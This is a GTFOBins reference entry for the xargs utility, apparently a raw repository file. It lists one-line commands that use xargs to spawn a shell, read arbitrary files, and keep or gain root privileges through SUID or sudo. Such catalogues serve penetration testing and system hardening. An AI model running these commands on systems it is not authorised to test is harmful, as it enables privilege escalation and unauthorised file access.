Files
GTFOBins.github.io/_gtfobins/xargs.md
2018-09-06 23:35:27 +02:00

562 B

functions
functions
execute-interactive file-read suid-enabled sudo-enabled
description code
GNU version only. xargs -a /dev/null sh
description code
This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. LFILE=file_to_read xargs -a "$LFILE" -0
description code
GNU version only. ./xargs -a /dev/null sh -p
description code
GNU version only. sudo xargs -a /dev/null sh